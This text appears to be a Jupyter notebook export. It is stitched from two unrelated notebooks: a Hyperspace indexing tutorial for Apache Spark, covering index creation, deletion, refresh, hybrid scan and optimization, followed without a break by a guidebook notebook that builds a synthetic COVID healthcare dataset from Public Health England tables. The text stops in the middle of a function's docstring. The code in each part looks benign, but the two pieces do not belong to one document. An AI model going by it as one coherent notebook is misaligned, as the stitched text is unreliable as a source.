import random
session_id = random.randint(0,1000000)
data_path = "/hyperspace/data-{0}".format(session_id)
index_location = "/hyperspace/indexes-{0}".format(session_id)
# Please note that you DO NOT need to change this configuration in production.
# We store all indexes in the system folder within Synapse.
spark.conf.set("spark.hyperspace.system.path", index_location)
# Start your Spark session
spark
# Disable BroadcastHashJoin, so Spark will use standard SortMergeJoin. Currently Hyperspace indexes utilize SortMergeJoin to speed up query.
spark.conf.set("spark.sql.autoBroadcastJoinThreshold", -1)
# Verify that BroadcastHashJoin is set correctly
print(spark.conf.get("spark.sql.autoBroadcastJoinThreshold"))
spark.conf.set("spark.hyperspace.explain.displayMode", "html")
###Output
_____no_output_____
###Markdown
Data PreparationTo prepare our environment, we will create sample data records and save them as parquet data files. While we use Parquet for illustration, you can use other formats such as CSV. In the subsequent cells, we will also demonstrate how you can create several Hyperspace indexes on this sample dataset and how one can make Spark™ use them when running queries. Our example records correspond to two datasets: *department* and *employee*. You should configure the "emp_Location" and "dept_Location" paths so that on the storage account they point to your desired location to save generated data files. The output of running the cell below shows the contents of our datasets as lists of triplets, followed by references to the DataFrames created to save the content of each dataset in our preferred location.
###Code
from pyspark.sql.types import StructField, StructType, StringType, IntegerType
# Sample department records
departments = [(10, "Accounting", "New York"), (20, "Research", "Dallas"), (30, "Sales", "Chicago"), (40, "Operations", "Boston")]
# Sample employee records
employees = [(7369, "SMITH", 20), (7499, "ALLEN", 30), (7521, "WARD", 30), (7566, "JONES", 20), (7698, "BLAKE", 30)]
# Create a schema for the dataframe
dept_schema = StructType([StructField('deptId', IntegerType(), True), StructField('deptName', StringType(), True), StructField('location', StringType(), True)])
emp_schema = StructType([StructField('empId', IntegerType(), True), StructField('empName', StringType(), True), StructField('deptId', IntegerType(), True)])
departments_df = spark.createDataFrame(departments, dept_schema)
employees_df = spark.createDataFrame(employees, emp_schema)
emp_Location = data_path + "/employees.parquet"
dept_Location = data_path + "/departments.parquet"
employees_df.write.mode("overwrite").parquet(emp_Location)
departments_df.write.mode("overwrite").parquet(dept_Location)
###Output
_____no_output_____
###Markdown
Let's verify the contents of the parquet files we created above to make sure they contain the expected records in the correct format. We later use these data files to create Hyperspace indexes and run sample queries.Running the cell below, the output displays the rows of the employee and department dataframes in a tabular form. There should be 5 employees and 4 departments, each matching one of the triplets we created in the previous cell.
###Code
# emp_Location and dept_Location are the user defined locations above to save parquet files
emp_DF = spark.read.parquet(emp_Location)
dept_DF = spark.read.parquet(dept_Location)
# Verify the data is available and correct
emp_DF.show()
dept_DF.show()
###Output
_____no_output_____
###Markdown
Hello Hyperspace Index!Hyperspace lets users create indexes on records scanned from persisted data files. Once successfully created, an entry corresponding to the index is added to Hyperspace's metadata. This metadata is later used by Apache Spark™'s Hyperspace-enabled optimizer during query processing to find and use proper indexes. Once indexes are created, users can perform several actions: - **Refresh** If the underlying data changes, users can refresh an existing index to capture that. - **Delete** If the index is not needed, users can perform a soft-delete, i.e., the index is not physically deleted but is marked as 'deleted' so it is no longer used in your workloads. - **Vacuum** If an index is no longer required, users can vacuum it, which forces a physical deletion of the index contents and associated metadata completely from Hyperspace's metadata.The sections below show how such index management operations can be done in Hyperspace.First, we need to import the required libraries and create an instance of Hyperspace. We later use this instance to invoke different Hyperspace APIs to create indexes on our sample data and modify those indexes.The output of running the cell below shows a reference to the created instance of Hyperspace.
###Code
from hyperspace import *
# Create an instance of Hyperspace
hyperspace = Hyperspace(spark)
###Output
_____no_output_____
###Markdown
Create IndexesTo create a Hyperspace index, the user needs to provide 2 pieces of information:* An Apache Spark™ DataFrame which references the data to be indexed.* An index configuration object: IndexConfig, which specifies the *index name*, *indexed* and *included* columns of the index. As you might have noticed, in this notebook, we illustrate indexing using the [Covering Index](https://www.red-gate.com/simple-talk/sql/learn-sql-server/using-covering-indexes-to-improve-query-performance/), which is the default index type in Hyperspace. In the future, we plan on adding support for other index types. We start by creating three Hyperspace indexes on our sample data: two indexes on the department dataset named "deptIndex1" and "deptIndex2", and one index on the employee dataset named 'empIndex1'. For each index, we need a corresponding IndexConfig to capture the name along with the column lists for the indexed and included columns. Running the cell below creates these IndexConfigs.**Note**: An *index column* is a column that appears in your filters or join conditions. An *included column* is a column that appears in your select/project.For instance, in the following query:```sql SELECT X FROM Table WHERE Y = 2 ```Y can be an *index column* and X can be an *included column*.
###Code
# Create index configurations
emp_IndexConfig = IndexConfig("empIndex1", ["deptId"], ["empName"])
dept_IndexConfig1 = IndexConfig("deptIndex1", ["deptId"], ["deptName"])
dept_IndexConfig2 = IndexConfig("deptIndex2", ["location"], ["deptName"])
###Output
_____no_output_____
###Markdown
Now, we create three indexes using our index configurations. For this purpose, we invoke "createIndex" command on our Hyperspace instance. This command requires an index configuration and the dataFrame containing rows to be indexed.Running below cell creates three indexes.
###Code
# Create indexes from configurations
hyperspace.createIndex(emp_DF, emp_IndexConfig)
hyperspace.createIndex(dept_DF, dept_IndexConfig1)
hyperspace.createIndex(dept_DF, dept_IndexConfig2)
###Output
_____no_output_____
###Markdown
List IndexesThe code below shows how a user can list all available indexes in a Hyperspace instance. It uses the `indexes` API which returns information about existing indexes as a Spark™ DataFrame, so you can perform additional operations. For instance, you can invoke valid operations on this DataFrame for checking its content or analyzing it further (for example filtering specific indexes or grouping them according to some desired property). The cell below uses the DataFrame's `show` action to fully print the rows and show details of our indexes in a tabular form. For each index, we can see all the information Hyperspace has stored about it in its metadata. You will immediately notice the following: - `config.indexName`, `config.indexedColumns`, `config.includedColumns` are the fields that a user normally provides during index creation. - `status.status` indicates if the index is being actively used by Spark's optimizer. - `dfSignature` is automatically generated by Hyperspace and is unique for each index. Hyperspace uses this signature internally to maintain the index and exploit it at query time. In the output below, all three indexes should have "ACTIVE" as their status, and their name, indexed columns, and included columns should match what we defined in the index configurations above.
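Since `indexes()` returns an ordinary Spark™ DataFrame, you can go beyond `show()` and filter or group it like any other DataFrame. A minimal sketch (the flat column names used below, such as `name` and `state`, are assumptions — run `printSchema()` first to confirm the exact schema exposed by your Hyperspace version):
```python
# Treat the index metadata as a regular DataFrame: inspect the schema,
# then keep only the indexes the optimizer can currently use.
idx_df = hyperspace.indexes()
idx_df.printSchema()
idx_df.filter(idx_df["state"] == "ACTIVE").select("name", "indexedColumns").show(truncate=False)
```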
###Code
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Delete IndexesA user can drop an existing index by using the `deleteIndex` API and providing the index name. Index deletion is a **soft-delete** operation, i.e., only the index's status in the Hyperspace metadata is changed from "ACTIVE" to "DELETED". This will exclude the deleted index from any future query optimization and Hyperspace no longer picks that index for any query. However, index files for a deleted index still remain available (since it is a soft-delete), so if you accidentally deleted the index, you could still restore it.The cell below deletes the index named "deptIndex2" and lists the Hyperspace metadata after that. The output should be similar to the cell above for "List Indexes" except for "deptIndex2", which should now have its status changed to "DELETED".
###Code
hyperspace.deleteIndex("deptIndex2")
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Restore IndexesA user can use the `restoreIndex` API to restore a deleted index. This brings the latest version of the index back to ACTIVE status and makes it usable again for queries. The cell below shows an example of the `restoreIndex` API. We delete "deptIndex1" and restore it. The output shows "deptIndex1" first went into the "DELETED" status after invoking the "deleteIndex" command and came back to the "ACTIVE" status after calling "restoreIndex".
###Code
hyperspace.deleteIndex("deptIndex1")
hyperspace.indexes().show()
hyperspace.restoreIndex("deptIndex1")
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Vacuum IndexesThe user can perform a **hard-delete**, i.e., fully remove files and the metadata entry for a deleted index, using the `vacuumIndex` API. Once done, this action is **irreversible** as it physically deletes all the index files associated with the index.The cell below vacuums the "deptIndex2" index and shows the Hyperspace metadata after vacuuming. You should see metadata entries for two indexes, "deptIndex1" and "empIndex1", both with "ACTIVE" status and no entry for "deptIndex2".
###Code
hyperspace.vacuumIndex("deptIndex2")
hyperspace.indexes().show()
###Output
_____no_output_____
###Markdown
Enable/Disable HyperspaceHyperspace provides APIs to enable or disable index usage with Spark™. - By using `enableHyperspace` API, Hyperspace optimization rules become visible to the Apache Spark™ optimizer and it will exploit existing Hyperspace indexes to optimize user queries. - By using `disableHyperspace` command, Hyperspace rules no longer apply during query optimization. You should note that disabling Hyperspace has no impact on created indexes as they remain intact.Below cell shows how you can use these commands to enable or disable hyperspace. The output simply shows a reference to the existing Spark™ session whose configuration is updated.
###Code
# Enable Hyperspace
Hyperspace.enable(spark)
# Disable Hyperspace
Hyperspace.disable(spark)
###Output
_____no_output_____
###Markdown
Index UsageIn order to make Spark use Hyperspace indexes during query processing, the user needs to make sure that Hyperspace is enabled. The cell below enables Hyperspace and creates two DataFrames containing our sample data records which we use for running example queries. For each DataFrame, a few sample rows are printed.
###Code
# Enable Hyperspace
Hyperspace.enable(spark)
emp_DF = spark.read.parquet(emp_Location)
dept_DF = spark.read.parquet(dept_Location)
emp_DF.show(5)
dept_DF.show(5)
###Output
_____no_output_____
###Markdown
Hyperspace's Index TypesCurrently, Hyperspace can exploit indexes for two groups of queries: * Selection queries with lookup or range selection filtering predicates.* Join queries with an equality join predicate (i.e. Equi-joins). Indexes for Accelerating FiltersOur first example query does a lookup on department records (see the cell below). In SQL, this query looks as follows:```sql SELECT deptName FROM departments WHERE deptId = 20 ```The output of running the cell below shows: - the query result, which is a single department name.- the query plan that Spark™ used to run the query. In the query plan, the "FileScan" operator at the bottom of the plan shows the datasource where the records were read from. The location of this file indicates the path to the latest version of the "deptIndex1" index. This shows that according to the query and using Hyperspace optimization rules, Spark™ decided to exploit the proper index at runtime.
###Code
# Filter with equality predicate
eqFilter = dept_DF.filter("""deptId = 20""").select("""deptName""")
eqFilter.show()
hyperspace.explain(eqFilter, True, displayHTML)
###Output
_____no_output_____
###Markdown
Our second example is a range selection query on department records. In SQL, this query looks as follows:```sql SELECT deptName FROM departments WHERE deptId > 20 ```Similar to our first example, the output of the cell below shows the query results (the names of two departments) and the query plan. The location of the data file in the FileScan operator shows that "deptIndex1" was used to run the query.
###Code
# Filter with range selection predicate
rangeFilter = dept_DF.filter("""deptId > 20""").select("deptName")
rangeFilter.show()
hyperspace.explain(rangeFilter, True, displayHTML)
###Output
_____no_output_____
###Markdown
Our third example is a query joining department and employee records on the department id. The equivalent SQL statement is shown below:```sql SELECT employees.deptId, empName, departments.deptId, deptName FROM employees, departments WHERE employees.deptId = departments.deptId ```The output of running the cell below shows the query results, which are the names of the five employees and the name of the department each employee works in. The query plan is also included in the output. Notice how the file locations for the two FileScan operators show that Spark used the "empIndex1" and "deptIndex1" indexes to run the query.
###Code
# Join
eqJoin = emp_DF.join(dept_DF, emp_DF.deptId == dept_DF.deptId).select(emp_DF.empName, dept_DF.deptName)
eqJoin.show()
hyperspace.explain(eqJoin, True, displayHTML)
###Output
_____no_output_____
###Markdown
Support for SQL SemanticsThe index usage is transparent to whether the user uses DataFrame API or Spark™ SQL. The following example shows the same join example as before but using Spark SQL, showing the use of indexes if applicable.
###Code
from pyspark.sql import SparkSession
emp_DF.createOrReplaceTempView("EMP")
dept_DF.createOrReplaceTempView("DEPT")
joinQuery = spark.sql("SELECT EMP.empName, DEPT.deptName FROM EMP, DEPT WHERE EMP.deptId = DEPT.deptId")
joinQuery.show()
hyperspace.explain(joinQuery, True, displayHTML)
###Output
_____no_output_____
###Markdown
Explain APISo far, you might have observed we have been using the explain API provided by Hyperspace. The `explain` API from Hyperspace is very similar to Spark's `df.explain` API but allows users to compare their original plan vs the updated index-dependent plan before running their query. You have an option to choose from html/plaintext/console mode to display the command output. The following cell shows an example with HTML. The highlighted section represents the difference between original and updated plans along with the indexes being used.
###Code
eqJoin = emp_DF.join(dept_DF, emp_DF.deptId == dept_DF.deptId).select(emp_DF.empName, dept_DF.deptName)
spark.conf.set("spark.hyperspace.explain.displayMode", "html")
hyperspace.explain(eqJoin, True, displayHTML)
###Output
_____no_output_____
###Markdown
Refresh IndexesIf the original data on which an index was created changes, then the index will no longer capture the latest state of the data and hence will not be used by Hyperspace to provide any acceleration. The user can refresh such a stale index using the `refreshIndex` API. This causes the index to be fully rebuilt and updates it according to the latest data records. Spoiler alert: if you are worried about fully rebuilding your index every time your data changes, don't worry! We will show you how to *incrementally refresh* your index in subsequent cells below.The two cells below show an example for this scenario:- The first cell adds two more departments to the original departments data. It reads and prints the list of departments to verify the new departments were added correctly. The output shows 6 departments in total: four old ones and two new ones. Invoking "refreshIndex" updates "deptIndex1" so the index captures the new departments.- The second cell runs our range selection query example. The results should now contain four departments: two are the ones seen before when we ran the query above, and two are the new departments we just added.
###Code
extra_Departments = [(50, "Inovation", "Seattle"), (60, "Human Resources", "San Francisco")]
extra_departments_df = spark.createDataFrame(extra_Departments, dept_schema)
extra_departments_df.write.mode("Append").parquet(dept_Location)
dept_DFrame_Updated = spark.read.parquet(dept_Location)
dept_DFrame_Updated.show(10)
hyperspace.refreshIndex("deptIndex1")
newRangeFilter = dept_DFrame_Updated.filter("deptId > 20").select("deptName")
newRangeFilter.show()
hyperspace.explain(newRangeFilter, True, displayHTML)
hyperspace.indexes().show()
# Clean-up the remaining indexes
hyperspace.deleteIndex("empIndex1")
hyperspace.deleteIndex("deptIndex1")
hyperspace.vacuumIndex("empIndex1")
hyperspace.vacuumIndex("deptIndex1")
###Output
_____no_output_____
###Markdown
Hybrid Scan for Mutable DatasetsOftentimes, if your underlying source data had some new files appended or existing files deleted, your index will get stale and Hyperspace decides not to use it. However, there are times where you just want to use the index without having to refresh it every time. There could be multiple reasons for doing so: 1. You do not want to continuously refresh your index but instead want to do it periodically since you understand your workloads the best. 2. You added/removed only a few files and do not want to wait for yet another refresh job to finish. To allow you to still use a stale index, Hyperspace introduces **Hybrid Scan**, a novel technique that allows users to utilize outdated or stale indexes (e.g., the underlying source data had some new files appended or existing files deleted), without refreshing indexes. To achieve this, when you set the appropriate configuration to enable Hybrid Scan, Hyperspace modifies the query plan to leverage the changes as follows:- Appended files can be merged with the index data by using **`Union` or `BucketUnion` (for join)**. Shuffling appended data can also be applied before merging, if needed.- Deleted files can be handled by injecting a `Filter-NOT-IN` condition on the **lineage column** of the index data, so that the indexed rows from the deleted files can be excluded at query time. You can check the transformation of the query plan in the examples below. Note: Hybrid Scan is only supported for non-partitioned data. Support for partitioned data is currently being worked on. Hybrid Scan for appended files - non-partitioned dataNon-partitioned data is used in the example below. In this example, we expect the join index to be used for the query and `BucketUnion` to be introduced for the appended files.
###Code
# GENERATE TEST DATA
testdata = [
("orange", 3, "2020-10-01"),
("banana", 1, "2020-10-01"),
("carrot", 5, "2020-10-02"),
("beetroot", 12, "2020-10-02"),
("orange", 2, "2020-10-03"),
("banana", 11, "2020-10-03"),
("carrot", 3, "2020-10-03"),
("beetroot", 2, "2020-10-04"),
("cucumber", 7, "2020-10-05"),
("pepper", 20, "2020-10-06")
]
testdata_location = data_path + "/productTable"
from pyspark.sql.types import StructField, StructType, StringType, IntegerType
testdata_schema = StructType([
StructField('name', StringType(), True),
StructField('qty', IntegerType(), True),
StructField('date', StringType(), True)])
test_df = spark.createDataFrame(testdata, testdata_schema)
test_df.write.mode("overwrite").parquet(testdata_location)
test_df = spark.read.parquet(testdata_location)
# CREATE INDEX
hyperspace.createIndex(test_df, IndexConfig("productIndex2", ["name"], ["date", "qty"]))
spark.conf.set("spark.sql.autoBroadcastJoinThreshold", -1)
filter1 = test_df.filter("name = 'banana'")
filter2 = test_df.filter("qty > 10")
query = filter1.join(filter2, "name")
# Check Join index rule is applied properly.
hyperspace.explain(query, True, displayHTML)
# Append new files.
append_data = [
("orange", 13, "2020-11-01"),
("banana", 5, "2020-11-01")
]
append_df = spark.createDataFrame(append_data, testdata_schema)
append_df.write.mode("append").parquet(testdata_location)
###Output
_____no_output_____
###Markdown
Hybrid scan is disabled by default. Therefore, you will see that since we appended new data, Hyperspace will decide NOT to use the index.In the output, you will see no plan differences (hence no highlighting).
###Code
# Hybrid Scan configs are false by default.
spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "false")
spark.conf.set("spark.hyperspace.index.hybridscan.delete.enabled", "false")
test_df_with_append = spark.read.parquet(testdata_location)
filter1 = test_df_with_append.filter("name = 'banana'")
filter2 = test_df_with_append.filter("qty > 10")
query = filter1.join(filter2, "name")
hyperspace.explain(query, True, displayHTML)
query.show()
###Output
_____no_output_____
###Markdown
Enable Hybrid Scan
In the plan with indexes, you can see that
`Exchange hashpartitioning` is required only for the appended files, so that we can still utilize the "shuffled" index data together with the appended files. `BucketUnion` is used to merge the "shuffled" appended files with the index data.
###Code
# Enable Hybrid Scan config. "delete" config is not necessary.
spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "true")
# spark.conf.set("spark.hyperspace.index.hybridscan.delete.enabled", "true")
# Need to redefine query to recalculate the query plan.
query = filter1.join(filter2, "name")
hyperspace.explain(query, True, displayHTML)
query.show()
###Output
_____no_output_____
###Markdown
Incremental Index RefreshWhen you are ready to update your indexes but do not want to rebuild your entire index, Hyperspace supports updating indexes in an incremental manner using the `hs.refreshIndex("name", "incremental")` API. This eliminates the need for a full rebuild of the index from scratch: previously created index files are reused, and the index is updated only on the newly added data.Of course, please be sure to use the complementary `optimizeIndex` API (shown below) periodically to make sure you do not see performance regressions. We recommend calling `optimize` at least once for every 10 times you call `refreshIndex(..., "incremental")`, assuming the data you added/removed is < 10% of the original dataset. For instance, if your original dataset is 100 GB, and you've added/removed data in increments/decrements of 1 GB, you can call `refreshIndex` 10 times before calling `optimizeIndex`. Please note that this example is simply used for illustration and you have to adapt it for your workloads.In the example below, notice the addition of a `Sort` node in the query plan when indexes are used. This is because partial indexes are created on the appended data files, causing Spark to introduce a `Sort`. Please also note that `Shuffle`, i.e. `Exchange`, is still eliminated from the plan, giving you the appropriate acceleration.
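As an illustration of that rule of thumb, here is a minimal helper sketch of ours (not part of the Hyperspace API) that triggers `optimizeIndex` on every 10th incremental refresh:
###Code
# Hedged sketch: a tiny helper (ours, not part of Hyperspace) implementing the
# "optimize roughly once per 10 incremental refreshes" rule of thumb.
refresh_counts = {}
def refresh_and_maybe_optimize(index_name, every=10):
    refresh_counts[index_name] = refresh_counts.get(index_name, 0) + 1
    hyperspace.refreshIndex(index_name, "incremental")
    if refresh_counts[index_name] % every == 0:
        hyperspace.optimizeIndex(index_name)
# Example usage (same index as in the cells below):
# refresh_and_maybe_optimize("productIndex2")
###Output
_____no_output_____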
###Code
def query():
test_df_with_append = spark.read.parquet(testdata_location)
filter1 = test_df_with_append.filter("name = 'banana'")
filter2 = test_df_with_append.filter("qty > 10")
return filter1.join(filter2, "name")
hyperspace.refreshIndex("productIndex2", "incremental")
hyperspace.explain(query(), True, displayHTML)
query().show()
###Output
_____no_output_____
###Markdown
Optimize Index layoutAfter calling incremental refreshes multiple times on newly appended data (e.g. if the user writes data in small batches or in streaming scenarios), the number of index files tends to become large, affecting the performance of the index (the classic "large number of small files" problem). Hyperspace provides the `hyperspace.optimizeIndex("indexName")` API to optimize the index layout and mitigate this problem.In the plan below, notice that Hyperspace has removed the additional `Sort` node from the query plan. Optimize can help avoid sorting for any index bucket that contains only one file. However, this will only be true if ALL the index buckets have at most 1 file per bucket after `optimizeIndex`.
###Code
# Append some more data and call refresh again.
append_data = [
("orange", 13, "2020-11-01"),
("banana", 5, "2020-11-01")
]
append_df = spark.createDataFrame(append_data, testdata_schema)
append_df.write.mode("append").parquet(testdata_location)
hyperspace.refreshIndex("productIndex2", "incremental")
# Call optimize. Ensure that Sort is removed after optimization (This is possible here because after optimize, in this case, every bucket contains only 1 file.).
hyperspace.optimizeIndex("productIndex2")
hyperspace.explain(query(), True, displayHTML)
###Output
_____no_output_____
###Markdown
Optimize modesThe default mode for optimization is "quick" mode, where files smaller than a predefined threshold are picked for optimization. To maximize the effect of optimization, Hyperspace allows another optimize mode, "full", as shown below. This mode picks ALL index files for optimization, irrespective of their file size, and creates the best possible layout of the index. It is also slower than the default optimize mode because more data is being processed.
###Code
hyperspace.optimizeIndex("productIndex2", "full")
hyperspace.explain(query(), True, displayHTML)
###Output
_____no_output_____
###Markdown
Clean UpTo make this notebook self-contained and not leave any dangling data, we have some small clean-up code below.
###Code
mssparkutils.fs.rm(data_path, True)
mssparkutils.fs.rm(index_location, True)
###Output
_____no_output_____ |
guidebooks/_build/html/_sources/rri/chapter4/project_design/synthetic_data_generation.ipynb | ###Markdown
Generating a Synthetic Healthcare DatasetThis notebook will go through the steps of creating a very simplistic (and therefore unrealistic!) model to generate a synthetic dataset, where each row represents a simulated "person", for illustrative purposes.The dataset is used in [Chapter 4](../index.md) when discussing the '[Data Analysis](data_analysis.ipynb)' stage of the project lifecycle.While several sophisticated and powerful tools (e.g. numpyro, Stan) exist for creating models in Python, here we will try to do something simple and understandable using nothing more than `pandas`, and the built-in `random` library.
###Code
import random
import datetime
import uuid
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
NHS IDThis one is easy - we'll just make up a unique string using the "uuid" library. The first 8 characters of the string will be more than enough to essentially guarantee uniqueness among tens of thousands of rows.
###Code
def get_nhs_id():
return str(uuid.uuid4())[:8]
###Output
_____no_output_____
###Markdown
Generating Age and GenderOne of the main inputs we will use for our generative model is some data on the age profiles of Covid cases and deaths in the UK, taken from this [Public Health England report](https://www.gov.uk/government/publications/covid-19-review-of-disparities-in-risks-and-outcomes)The data is in Open Document (ods) format - we need to install the `odfpy` package to read it into pandas in the same way as we would an Excel document.
###Code
!pip install odfpy
###Output
Requirement already satisfied: odfpy in /Users/nbarlow/opt/anaconda3/lib/python3.7/site-packages (1.4.1)
Requirement already satisfied: defusedxml in /Users/nbarlow/opt/anaconda3/lib/python3.7/site-packages (from odfpy) (0.6.0)
###Markdown
The document contains a couple of useful sheets - Figure_1_1 has the age/sex pyramid of lab-confirmed COVID cases, while Figure_1_4 has the equivalent table for deaths following a positive COVID test - we may use this second one later on.
###Code
df_cases_age_sex = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906917/Section_1_-_Age_and_Sex.ods",
sheet_name="Figure_1_1",engine="odf",skiprows=list(range(6))+list(range(16,27)))
# remove the first two rows, dealing with <20 year olds
df_cases_age_sex.drop([0,1], inplace=True)
df_cases_age_sex
###Output
_____no_output_____
###Markdown
We can just sum the "Males" and "Females" columns to get the total number of each gender and calculate the probability of our simulated person being female, then just generate a random number and compare to that probability.
###Code
def get_sex(df):
prob_female = df["Females"].sum()/(df["Males"].sum()+df["Females"].sum())
if random.random() < prob_female:
return "F"
else:
return "M"
###Output
_____no_output_____
###Markdown
To generate an age from an age-profile distribution, we can use a trick - by calculating the cumulative fraction over the rows, we can then generate a random number between 0 and 1, and see which row that number falls in, to give us a 10-year age range. We then pick a random year from that range.
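The idea is standard inverse-CDF sampling. Here is a tiny standalone sketch of the same trick on a toy distribution (the category weights are made up purely for illustration):
###Code
# Hedged sketch: the same cumulative-fraction trick on a made-up toy distribution.
import random
toy = {"0-9": 5, "10-19": 20, "20-29": 40, "30-39": 35}
total = sum(toy.values())
cumulative = []
running = 0
for label, weight in toy.items():
    running += weight
    cumulative.append((label, running / total))
def sample_toy():
    x = random.random()
    for label, cum_frac in cumulative:
        if x < cum_frac:
            return label
    return cumulative[-1][0]
print([sample_toy() for _ in range(5)])
###Output
_____no_output_____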
###Code
df_cases_age_sex["cumulative_sum_m"] = df_cases_age_sex["Males"].cumsum()/df_cases_age_sex["Males"].sum()
df_cases_age_sex["cumulative_sum_f"] = df_cases_age_sex["Females"].cumsum()/df_cases_age_sex["Females"].sum()
df_cases_age_sex
def get_age(df, sex):
# are we looking in the male or female column?
column_name = "cumulative_sum_f" if sex=="F" else "cumulative_sum_m"
# generate a random number between 0 and 1
x = random.random()
# Highly inefficient way of finding which row of the dataframe
# has that x value in the cumulative sum range.
for i in range(len(df)):
if i == 0 and x < df.iloc[i][column_name]:
break
elif x > df.iloc[i-1][column_name] and x < df.iloc[i][column_name]:
break
# Now we know the row number "i" - pick an age from that 10-yr range
# we have the "age_range" label as a string, e.g. "0-9" - first
# split on the dash to get lower and upper bounds
age_range = df.iloc[i]["Age group"]
# deal with a couple of special cases
if age_range == "<10":
age_range = "0-9"
elif age_range == "80+":
age_range="80-89"
age_range = age_range.split("-")
# Now use "randint" to choose an age (note that lower and upper bounds
# are inclusive here)
age = random.randint(int(age_range[0]), int(age_range[1]))
return age
###Output
_____no_output_____
###Markdown
Let's just check that these functions are doing something sensible - generate 1000 ages and plot them as a histogram:
###Code
ages = {"M": [], "F":[]}
for _ in range(1000):
sex = get_sex(df_cases_age_sex)
ages[sex].append(get_age(df_cases_age_sex, sex))
plt.hist(ages["M"],bins=10,range=(0,100), alpha=0.5, label="M")
plt.hist(ages["F"],bins=10,range=(0,100), alpha=0.5, label="F")
###Output
_____no_output_____
###Markdown
OK, that looks reasonable. We see the (surprising?) feature that women in their 60s and 70s are less likely than women in their 50s (or men in their 60s and 70s) to be diagnosed with Covid - checking back on the original DataFrame, we see that this is reflected in the numbers.Let's move on. Generating ethnicityWe will use exactly the same approach to generate the ethnicity of our simulated people, using data from the same [Public Health England report](https://www.gov.uk/government/publications/covid-19-review-of-disparities-in-risks-and-outcomes).Again, we read tables from an .ods file into pandas
###Code
df_ethnicity = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906922/Section_4_-_Ethnicity.ods",
sheet_name="Figure_4_1",engine="odf",skiprows=list(range(4))+[55,56])
df_ethnicity.head()
###Output
_____no_output_____
###Markdown
*Note* the column here is _incorrectly_ labelled as "deaths", however, it does in fact refer to cases.Here we have a bit more work to do. For the moment, we don't care about the date, so we just want to sum over all dates for each ethnic group.Again, we also calculate the cumulative sum, which will allow us to generate the ethnicity of a simulated patient from this distribution.
###Code
df_ethnicity_summary=df_ethnicity.groupby(["Ethnicity"])["Deaths"].sum().to_frame(name = 'sum').reset_index()
# calculate the cumulative sum again
df_ethnicity_summary["cumulative_frac"] = df_ethnicity_summary["sum"].cumsum()/df_ethnicity_summary["sum"].sum()
df_ethnicity_summary
###Output
_____no_output_____
###Markdown
We can now write a function to generate an ethnicity, using the same trick as above with the cumulative fraction:
###Code
def get_ethnicity(df):
x = random.random()
for i in range(len(df)):
if i == 0 and x < df.iloc[i]["cumulative_frac"]:
break
elif x > df.iloc[i-1]["cumulative_frac"] and x < df.iloc[i]["cumulative_frac"]:
break
return df.iloc[i]["Ethnicity"]
###Output
_____no_output_____
###Markdown
Week of AdmissionThere is a table on hospital admission rates for different regions of the country on the PHE document. We will read this table, but just sum over all regions, and yet again, calculate the cumulative fraction as we go.
###Code
df_hospital_admissions = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906920/Section_2_-_Geography.ods",
sheet_name="Figure_2_3",engine="odf",skiprows=list(range(6))+list(range(74,85)))
df_hospital_admissions["sum"] = df_hospital_admissions.sum(axis=1)
df_hospital_admissions["cumulative_frac"] = df_hospital_admissions["sum"].cumsum()/df_hospital_admissions["sum"].sum()
df_hospital_admissions.head()
def get_admission_date(df):
x = random.random()
for i in range(len(df)):
if i == 0 and x < df.iloc[i]["cumulative_frac"]:
break
elif x > df.iloc[i-1]["cumulative_frac"] and x < df.iloc[i]["cumulative_frac"]:
break
return df.iloc[i]["Date"].to_pydatetime()
###Output
_____no_output_____
###Markdown
Probability of admission, and of invasive ventilationWe will use yet another table from the PHE report to get the probability of being admitted to hospital, and of getting critical care (here simplified to saying "received invasive ventilation"), as a function of ethnicity. We also make a correction to the latter probability, based on date of admission - at some point, as medical staff learned more, ventilation became less likely.
###Code
df_hospital_care = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906922/Section_4_-_Ethnicity.ods",
sheet_name="Figure_4_3",engine="odf",skiprows=list(range(5))+list(range(12,25)))
df_hospital_care
###Output
_____no_output_____
###Markdown
Here, we want to convert the percentages into absolute numbers, so we can combine with `df_ethnicity_summary` to get the probability of being admitted (sum of both "Lower level of care" and "Critical care"), and of being put on ventilation ("Critical care")
###Code
df_hospital_care["num_lower"] = (df_hospital_care["Lower level of care (%)"]/100) * df_hospital_care.loc[5]["Lower level of care (%)"]
df_hospital_care["num_critical"] = (df_hospital_care["Critical care (%)"]/100) * df_hospital_care.loc[5]["Critical care (%)"]
df_hospital_care["num_admitted"] = (df_hospital_care["num_lower"] + df_hospital_care["num_critical"]).astype(int)
# Get rid of the "Total admitted" row of this dataframe
df_hospital_care = df_hospital_care.drop(5)
df_hospital_care
###Output
_____no_output_____
###Markdown
So let's:* Merge with the "df_ethnicity_summary" dataframe on "Ethnicity"* Add new columns for "prob admitted" and "prob ventilation"Note that there are some mismatches in the "ethnicity" names - we should rename "Any other ethnic group" in df_ethnicity_summary to "Other ethnic groups", and also fix capitalisation on "Mixed / Multiple ethnic groups"
###Code
# fix name mismatches
df_ethnicity_summary.replace(to_replace="Any other ethnic group", value="Other ethnic groups", inplace=True)
df_ethnicity_summary.replace(to_replace="Mixed / Multiple Ethnic Groups", value="Mixed / Multiple ethnic groups", inplace=True)
# harmonize column names
df_hospital_care.rename(columns={"Ethnic group":"Ethnicity"},inplace=True)
# merge dataframes
df_hospital_care = df_hospital_care.merge(df_ethnicity_summary, on="Ethnicity")
# add columns
df_hospital_care["prob_admitted"] = df_hospital_care["num_admitted"]/df_hospital_care["sum"]
df_hospital_care["prob_ventilation"] = df_hospital_care["num_critical"]/df_hospital_care["sum"]
df_hospital_care
###Output
_____no_output_____
###Markdown
Let's combine all this to get hospital admission and care data:
###Code
def get_hospital_data(df_admission, df_care, ethnicity, change_date="2020-04-15"):
"""
params
======
df_admission: pandas DataFrame containing admission dates
df_care: pandas DataFrame containing probabilities of admission and ventilation by ethnicity
ethnicity: str, the ethnicity of the simulated patient
